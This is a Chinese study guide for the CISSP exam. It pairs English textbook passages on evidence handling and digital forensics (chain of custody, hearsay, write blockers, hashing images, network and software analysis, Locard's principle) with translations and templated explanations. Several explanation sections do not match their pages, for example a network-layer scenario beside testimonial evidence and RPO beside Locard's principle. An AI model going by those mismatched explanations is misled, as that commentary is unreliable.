读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 08 / PDF P1287

第 1287 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chain of Evidence Real evidence, like any type of evidence, must meet the relevancy, materiality, and competency requirements before being admitted into court. Additionally, real evidence must be authenticated. This can be done by a witness who can actually identify an object as unique (for example, “That knife with my name on the handle is the one that the intruder took off the table in my house and used to stab me”) and unaltered, meaning that it has not been tampered with from the time of collection until the time of use in court. In many cases, it is not possible for a witness to uniquely identify an object in court.

In those cases, a chain of evidence (also known as a chain of custody) must be established. The chain of evidence documents everyone who handles evidence—including the police who originally collect it, the evidence technicians who process it, and the lawyers who use it in court. The location of the evidence must be fully documented from the moment it was collected to the moment it appears in court to ensure that it is indeed the same item. This requires thorough labeling of evidence and comprehensive logs, noting who had access to the evidence at specific times and the reasons they required such access.

When evidence is labeled to preserve the chain of custody, the label should include the following types of information about the collection: General description of the evidence Time and date the evidence was collected Exact location the evidence was collected from Name of the person collecting the evidence Relevant circumstances surrounding the collection Each person who handles the evidence must sign the chain of custody log, indicating the time they took direct responsibility for the evidence and the time they handed it off to the next person in the chain of custody.

The chain must provide an unbroken sequence of events accounting for the evidence from the time it was collected until the time of the trial.

中文直译 / 整理

证据链 实物证据与其他任何类型的证据一样,在被法院采纳之前,必须满足相关 性、重要性和适格性要求。 此外,实物证据必须经过认证。 这可以通过一 位能够实际辨认该物品为独特且未被改动的证人来完成(例如,“那把刀 柄上刻有我名字的刀,就是入侵者从我家桌上拿走并用来刺伤我的那把”), 即从收集到在法庭上使用期间,该物品未被篡改。 在许多情况下,证人无法在法庭上唯一地识别某一物品。 在这些情况下, 必须建立一个证据链(也称为保管链)。 证据链记录了所有接触过证据的 人,包括最初收集证据的警察、处理证据的证据技术人员,以及在法庭上 使用证据的律师。 必须从证据被收集的那一刻起,到其出现在法庭的那一 刻止,完整记录证据的存放位置,以确保其确实是同一物品。 这需要对证 据进行详尽的标签标注和全面的记录,注明特定时间谁接触过证据以及他 们需要接触的原因。 为保存保管链而对证据进行标签标注时,标签应包含有关收集的以下信息: 证据的一般描述 证据收集的时间和日期 证据收集的确切地点 收集证据人员的姓名 与收集相关的具体情况 每位处理证据的人必须在证据保管链日志上签名,注明其开始对证据负直接 责任的时间以及将证据移交予保管链下一位人员的时间。

该保管链必须提供 从证据被收集到审判期间完整无间断的事件序列,以说明证据的去向。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

日志:日志记录系统和用户活动,用于监控、审计和调查。

证据保管链:证据保管链记录证据从收集到提交的每一次接触和转移。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1287 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

日志要保护完整性、时间同步和访问控制。

调查取证题看到证据,优先保护完整性和保管链。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
日志 日志记录系统和用户活动,用于监控、审计和调查。
证据保管链 证据保管链记录证据从收集到提交的每一次接触和转移。
学习单元 09 / PDF P1288

第 1288 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Testimonial Evidence Testimonial evidence is, quite simply, evidence consisting of the testimony of a witness, either verbal testimony in court or written testimony in a recorded deposition. Witnesses must take an oath agreeing to tell the truth, and they must have personal knowledge on which their testimony is based. Furthermore, witnesses must remember the basis for their testimony (they may consult written notes or records to aid their memory). Witnesses can offer direct evidence: oral testimony that proves or disproves a claim based on their own direct observation.

The testimonial evidence of most witnesses must be strictly limited to direct evidence based on the witness's factual observations. However, this does not apply if a witness has been accepted by the court as an expert in a certain field. In that case, the witness may offer an expert opinion based on the other facts presented and their personal knowledge of the field. Hearsay Rule When a witness offers testimony in court, they must normally avoid the act of hearsay, meaning that they cannot testify about what someone else told them outside of court because the court has no way to substantiate that evidence and find it admissible.

That said, the hearsay rule is one that has many, many exceptions. These include past testimony given by a witness under oath that is no longer available, a statement made against the interest of the person making the statement, a dying utterance, public records, and many other situations. An extremely important exception to this rule for forensic analysts is the business records exception to the hearsay rule.

This says that business records, such as the logs generated by a computer system, may be admitted as evidence if they were made at the time of the event by someone or something with direct knowledge, that they were kept in the course of regular business activity, and that keeping those records is a regular practice of the organization. Records admitted under the business records exception must be accompanied by the testimony of an individual qualified to show that these criteria were met. This exception is commonly used to introduce system logs and other records generated by computer systems.

中文直译 / 整理

证言证据 证言证据 简单来说,是指由证人提供的证词,包括在法庭上的口头 证词或在记录的书面证词中提供的证词。 证人必须宣誓承诺如实作证,并且其 证词必须基于其个人知识。 此外,证人必须能够回忆起其证词的依据(他们可 以查阅书面笔记或记录以辅助记忆)。 证人可以提供直接证据:基于其自身直 接观察的口头证词,用以证明或反驳某一主张。 大多数证人的证言证据必须严 格限定为基于证人事实观察的直接证据。 然而,如果法院认可某证人为某一领 域的专家,则此限制不适用。 在这种情况下,该证人可根据其他呈示的事实及 其对该领域的个人知识,提供专家意见。 传闻规则 当证人在法庭上提供证词时,通常必须避免传闻行为,即他们不能就他人 在法庭外告诉他们的内容作证,因为法院无法核实此类证据的可靠性并认 定其可采性。 尽管如此,传闻规则包含许多例外情况,包括:证人在宣誓下提供的、现 已无法出庭的过往证词; 与陈述者自身利益相悖的陈述; 临终陈述; 公共 记录; 以及其他多种情形。 对于法医分析人员而言,该规则的一项极为重要的例外是商业记录例外。

该例外规定,如果计算机系统生成的日志等商业记录是在事件发生时由具 有直接知识的人或系统制作的,并且是在日常业务活动中保持的,且保存 这些记录是该组织的常规做法,则这些记录可被采纳为证据。 根据商业记录例外 admitted 的记录,必须附有具备资格的人员的证词, 以证明这些标准已得到满足。 此例外通常用于引入系统日志和其他由计 算机系统生成的记录。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1288 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P1289

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Demonstrative Evidence Demonstrative evidence is evidence used to support testimonial evidence. It consists of items that may or may not be admitted into evidence themselves but are used to help a witness explain a concept or clarify an issue. For example, demonstrative evidence might include a diagram explaining the contents of a network packet or showing the process used to conduct a distributed denial-of-service attack. The admissibility of demonstrative evidence is a matter left to the trial court with the general principle that demonstrative evidence must assist the jury in understanding a case.

Artifacts, Evidence Collection, and Forensic Procedures Collecting digital evidence is a tricky process and should be attempted only by professional forensic technicians. The International Organization on Computer Evidence (IOCE) outlines five principles to guide digital evidence technicians as they perform media analysis, network analysis, and software analysis in the pursuit of forensically recovered evidence: Upon seizing digital evidence, actions taken should not change that evidence. When it is necessary for a person to access original digital evidence, that person must be forensically competent.

All activity relating to the seizure, access, storage, or transfer of digital evidence must be fully documented, preserved, and available for review. An individual is responsible for all actions taken with respect to digital evidence while the digital evidence is in their possession. Any agency that is responsible for seizing, accessing, storing, or transferring digital evidence is responsible for compliance with these principles. As you conduct forensic evidence collection, it is important to preserve the original evidence. Remember that the very conduct of your investigation may alter the evidence you are evaluating.

Therefore, when analyzing digital evidence, it's best to work with a copy of the actual evidence whenever possible. For example, when conducting an investigation into the contents of a hard drive, make an image of that drive, seal the original drive in an evidence bag, and then use the disk image for your investigation.

中文直译 / 整理

示例性证据 示例性证据 是用于支持证人证词的证据。 它由一些本身可能被采纳 也可能不被采纳的物品组成,但用于帮助证人解释某个概念或澄清某个问题。 例如,示例性证据可能包括解释网络数据包内容或展示分布式拒绝服务攻击过 程的图表。 示例性证据的可采性由审判法院酌情决定,一般原则是示例性证据 必须有助于陪审团理解案件。 工件、证据收集与取证程序 收集数字证据是一个复杂的过程,仅应由专业的取证技术人员进行。 国际计算 机证据组织(IOCE)制定了五项原则,以指导数字证据技术人员在进行媒体分 析、网络分析和软件分析以获取取证证据时的操作: 在扣押数字证据时,所采取的行动不应改变该证据。 当有必要由人员访问原始数字证据时,该人员必须具备取证能力。 与数字证据的扣押、访问、存储或传输相关的所有活动都必须完整记录、保 存并可供审查。 在数字证据由其保管期间,个人对其所采取的与数字证据相关的所有行为负 责。 任何负责扣押、访问、存储或 传输数字证据的机构都负有遵守这些原则的责任。 在进行电子证据收集时,保护原始证据至关重要。 请记住,您的调查行为本身 可能会改变您所评估的证据。 因此,在分析数字证据时,最好尽可能使用实际 证据的副本。

例如,在调查硬盘内容时,应制作该硬盘的镜像,将原始硬盘密 封在证据袋中,然后使用磁盘镜像进行调查。

小白解释

场景先行:你是公司的安全负责人,正在读第 1289 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 11 / PDF P1290

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Media Analysis Media analysis, a branch of computer forensic analysis, involves the identification and extraction of information from storage media. This may include magnetic media (e.g., hard disks, tapes) or optical media (e.g., CDs, DVDs, Blu-ray discs). Techniques used for media analysis may include the recovery of deleted files from unallocated sectors of the physical disk, the live analysis of storage media connected to a computer system (especially useful when examining encrypted media), and the static analysis of forensic images of storage media. When gathering information from storage devices, analysts should never access hard drives or other media from a live system.

Instead, they should power off the system (after collecting other evidence), remove the storage device, and then attach the storage device to a dedicated forensic workstation, using a write blocker. Write blockers are hardware adapters that physically sever the portion of the cable used to connect the storage device that would write data to the device, reducing the likelihood of accidental tampering with the device. After connecting the device to a live workstation, the analyst should immediately calculate a cryptographic hash of the device contents and then use forensic tools to create a forensic image of the device: a bitwise copy of the data stored on the device.

The analyst should then compute the cryptographic hash of that image to ensure that it is identical to the original media contents. After creating and verifying a forensic image, the original image file should be preserved as evidence. Analysts should create copies of that image (verifying the integrity of the hash) and then use those images for any analysis. This careful process reduces the likelihood of error and ensures the preservation of the chain of custody. In-Memory Analysis Investigators often wish to collect information from the memory of live systems. This is a tricky undertaking, since it can be difficult to work with memory without actually altering its contents.

When gathering the contents of memory, analysts should use trusted tools to generate a memory dump file and place it on a forensically prepared device, such as a USB drive. This memory dump file contains all the contents collected from memory and may then be used for analysis. As with other types of digital evidence, the analyst collecting the memory dump should compute a cryptographic hash of the dump file to later prove its authenticity.

中文直译 / 整理

媒体分析 媒体分析是计算机取证分析的一个分支,涉及从存储介质中识别和提 取信息。 这可能包括磁性介质(例如硬盘、磁带)或光学介质(例如CD、 DVD、蓝光光盘)。 用于媒体分析的技术可能包括从物理磁盘未分配扇区中恢复已删除的文件、对 连接到计算机系统的存储介质进行实时分析(尤其在检查加密介质时非常有用), 以及对存储介质的取证镜像进行静态分析。 在从存储设备收集信息时,分析人员绝不应从正在运行的系统中直接访问硬 盘或其他介质。 相反,他们应关闭系统(在收集其他证据后),移除存储设 备,然后使用写保护器将存储设备连接到专用的取证工作站。 写保护器是硬 件适配器,它物理性地切断了用于向设备写入数据的电缆部分,从而降低了 意外篡改设备的可能性。 将设备连接到正在运行的工作站后,分析人员应立即计算设备内容的加密哈 希值,然后使用取证工具创建设备的取证镜像:即设备上存储数据的逐位副 本。 随后,分析人员应计算该镜像的加密哈希值,以确保其与原始介质内容 完全一致。 在创建并验证取证镜像后,原始镜像文件应作为证据保存。 分析人员应创建该 镜像的副本(验证哈希值的完整性),然后使用这些镜像进行任何分析。

这一 严谨的流程降低了出错的可能性,并确保了证据链的完整性。 内存分析调查人员通常希望从活动系统的内存中收集信息。 这是一项复杂的任务, 因为在不改变内存内容的情况下处理内存可能很困难。 在收集内存内容时,分析 人员应使用可信工具生成内存转储文件,并将其保存在经过取证准备的设备上, 例如USB驱动器。 此内存转储文件包含从内存中收集的所有内容,随后可用于分 析。 与其它类型的数字证据一样,收集内存转储的分析人员应计算转储文件的加 密哈希值,以便后续证明其真实性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

加密:加密把内容变成未授权者看不懂的形式。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

哈希本身不提供机密性;它主要用于完整性校验。

调查取证题看到证据,优先保护完整性和保管链。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
加密 加密把内容变成未授权者看不懂的形式。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
证据保管链 证据保管链记录证据从收集到提交的每一次接触和转移。
学习单元 12 / PDF P1291

第 1291 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The analyst should preserve the original collected dump and work from copies of that dump file. Network Analysis Forensic investigators are also often interested in the activity that took place over the network during a security incident. This is often difficult to reconstruct due to the volatility of network data—if it isn't deliberately recorded at the time it occurs, it generally is not preserved. Network forensic analysis, therefore, often depends on either prior knowledge that an incident is under way or the use of preexisting security controls that log network activity.

These include: Intrusion detection and prevention system logs Network flow data captured by a flow monitoring system Packet captures deliberately collected during an incident Logs from firewalls and other network security devices When collecting data directly from a network during a live analysis, forensic technicians should use a SPAN port on a switch (which mirrors data sent to one or more other ports for analysis) or a network tap, which is a hardware device that performs the same function as a SPAN port. Both of these approaches generate packet dumps without actually altering the network traffic being exchanged between two systems.

In cases where this is not possible, the analyst may run a software protocol analyzer on one of the communicating systems, but this approach is not as reliable as using a dedicated hardware device. After collecting network packets, they should be treated in the same manner as any other digital evidence. The tools creating the packet capture should write them to forensically prepared media. Analysts should compute cryptographic hashes of the original evidence files and work only with copies of those original files.

The task of the network forensic analyst is to collect and correlate information from these disparate sources and produce as comprehensive a picture of network activity as possible. Software Analysis Forensic analysts may also be called on to conduct forensic reviews of applications or the activity that takes place within a running application. In some cases, when malicious insiders are suspected, the forensic analyst may be asked to conduct a review of software code,

中文直译 / 整理

分析人员应保留原始收集的转储文件,并从该转储文件的副本中进行工作。 网络分析在安全事件发生期间,取证调查人员通常也对网络上的活动感兴趣。 由于网络数据的易失性,这种活动通常难以重建——如果在发生时未被有意记 录,通常就不会被保留。 因此,网络取证分析通常依赖于事先知晓事件正在发生,或使用预先存在 的安全控制措施来记录网络活动。 这些措施包括: 入侵检测和防御系统日志 由流量监控系统捕获的网络流数据 在事件期间有意收集的数据包捕获 防火墙和其他网络安全部署的日志 在实时分析期间直接从网络收集数据时,取证技术人员应使用交换机上的 SPAN端口(该端口将发送到一个或多个其他端口的数据进行镜像)或网络分 流器,后者是一种执行与SPAN端口相同功能的硬件设备。 这两种方法都能生 成数据包转储,而不会实际更改两个系统之间交换的网络流量。 在无法实现 上述方法的情况下,分析人员可在其中一个通信系统上运行软件协议分析器, 但这种方法不如使用专用硬件设备可靠。 收集网络数据包后,应将其视为任何其他数字证据一样处理。 生成数据包捕获 的工具应将数据包写入经过取证准备的存储介质。

分析人员应计算原始证据文 件的加密哈希值,并仅使用这些原始文件的副本进行操作。 网络取证分析人员的任务是收集并关联来自这些不同来源的信息,尽可能全 面地还原网络活动的全貌。 软件分析取证分析人员可能还需要对应用程序或运行中的应用程序内发生的 活动进行取证审查。 在某些情况下,当怀疑有恶意内部人员时,取证分析人 员可能被要求审查软件代码,

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1291 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 13 / PDF P1292

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

looking for backdoors, logic bombs, or other security vulnerabilities. For more on these topics, see Chapter 21, “Malicious Code and Application Attacks.” In other cases, forensic analysts may be asked to review and interpret the log files from application or database servers, seeking other signs of malicious activity, such as SQL injection attacks, privilege escalations, or other application attacks. These are also discussed in Chapter 21. Software analysis may also include the validation of file hash values against known file types.

The National Software Reference Library (NSRL) maintained by the National Institute of Standards and Technology includes the cryptographic hash values for over 130 million known applications, making it easier for forensic analysts to detect authentic and manipulated files. For more information on the NSRL, see www.nist.gov/itl/ssd/software-quality-group/national-softwarereference-library-nsrl. Hardware/Embedded Device Analysis Finally, forensic analysts often must review the contents of hardware and embedded devices.

This may include a review of: Personal computers Smartphones Tablet computers Embedded computers in cars, security systems, and other devices Analysts conducting these reviews must have specialized knowledge of the systems under review. An organization may have to call in expert consultants who are familiar with the memory, storage systems, and operating systems of such devices. Because of the complex interactions between software, hardware, and storage, the discipline of hardware analysis requires skills in both media analysis and software analysis.

中文直译 / 整理

查找后门、逻辑炸弹或其他安全漏洞。 有关这些主题的更多信息,请参见 第21章,“恶意代码与应用程序攻击。 ” 在其他情况下,法医分析人员可能被要求审查和解释应用程序或数据库服务器 的日志文件,以寻找其他恶意活动的迹象,例如SQL注入攻击、权限提升或其 他应用程序攻击。 这些内容也在第21章中进行了讨论。 软件分析还可能包括将文件哈希值与已知文件类型进行验证。 由美国国家标 准与技术研究院(NIST)维护的国家软件参考库(NSRL)包含了超过1.3亿 个已知应用程序的加密哈希值,这使得法医分析人员更容易识别真实文件和 被篡改的文件。 有关NSRL的更多信息,请参阅 www.nist.gov/itl/ssd/software-quality-group/national-softwarereference-library-nsrl. 硬件/嵌入式设备分析最后,法医分析人员通常必须审查硬件和嵌入式设备 的内容。 这可能包括对以下内容的审查: 个人计算机 智能手机 平板电脑 汽车、安防系统和其他设备中的嵌入式计算机 进行这些审查的分析师必须具备被审查系统的专业知识。 组织可能需要聘请熟 悉此类设备内存、存储系统和操作系统的专家顾问。

由于软件、硬件和存储之 间存在复杂的相互作用,硬件分析这一学科需要具备媒体分析和软件分析的技 能。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 14 / PDF P1293

第 1293 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Locard's Exchange Principle Locard's exchange principle is the core principle that underlies the field of forensic science. The principle is the work of Dr. Edmond Locard, one of the pioneers of criminal forensics. Locard started a criminal forensics lab in Lyon, France, where he developed the first police laboratory and created many forensics techniques that are the basis for evidence analysis that is still performed today. Locard's exchange principle, clearly stated, is that “every contact leaves a trace.” That means that when two objects touch each other, there will be some evidence left behind.

That might be a fingerprint, a carpet fiber, a drop of blood or spit, a scratch, or virtually anything else. It then becomes the work of the forensic scientist to discover those traces and interpret them to learn more about a crime that took place. Most digital forensics experts believe that Locard's principle applies in the digital world as well. Whenever there is contact between two digital objects, that contact leaves a trace. It's up to cybersecurity experts to discover and interpret those traces. Let's think about this in the context of an example. Suppose that an attacker conducts a SQL injection attack against a website.

That attack is going to leave evidence in all of the systems that are touched as part of the attack. Let's think about what some of those places may be. First, the attacker used some sort of device to wage the attack. That might be a laptop or desktop computer, a smartphone, a virtual server instance, or something else. That device is going to contain some evidence of the attack. It might have logs that show who was logged into the device, tools that were used in the attack, or the device itself might have physical fingerprints on it or be in an area covered by a security camera. Next, the attacker was connected to some network.

Maybe they were at home or in an office, or perhaps they waged the attack from a coffee shop or airport Wi-Fi. The network used by the attacker will likely have logs that might reveal important information about the attack.

中文直译 / 整理

洛卡德交换原理 洛卡德交换原理是法医学领域的核心原理。 该原理由犯罪法医学的先驱之 一埃德蒙·洛卡德博士提出。 洛卡德在法国里昂创建了一个犯罪法医学实验 室,在那里他建立了第一个警察实验室,并开发了许多法医学技术,这些 技术至今仍是证据分析的基础。 洛卡德交换原理明确指出:‘凡接触,必留痕迹。 ’这意味着,当两个物 体相互接触时,总会留下某些证据。 这些证据可能是指纹、地毯纤维、一 滴血或唾液、划痕,或几乎任何其他东西。 法医科学家的工作就是发现这 些痕迹,并对其进行解读,以深入了解发生的犯罪事件。 大多数数字取证专家认为,洛卡德原理同样适用于数字世界。 每当两个数字 对象发生接触时,这种接触都会留下痕迹。 而网络安全专家的任务就是发现 并解读这些痕迹。 让我们结合一个例子来思考这个问题。 假设攻击者对一个网站实施了 SQL注入攻击。 这次攻击会在攻击过程中涉及的所有系统中留下证据。 让 我们思考一下这些可能的痕迹位置。 首先,攻击者使用某种设备发动了攻击。 这可能是笔记本电脑或台式 机、智能手机、虚拟服务器实例,或其他设备。 该设备中会包含此次 攻击的一些证据。

它可能有日志记录显示谁登录过该设备、使用了哪 些攻击工具,或者设备本身可能留下物理指纹,或位于监控摄像头覆 盖的区域内。 接下来,攻击者连接到了某个网络。 他们可能在家或办公室,也可能 在咖啡店或机场的Wi‑Fi上发动了攻击。 攻击者所使用的网络很可能 包含日志,这些日志可能揭示有关攻击的重要信息。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

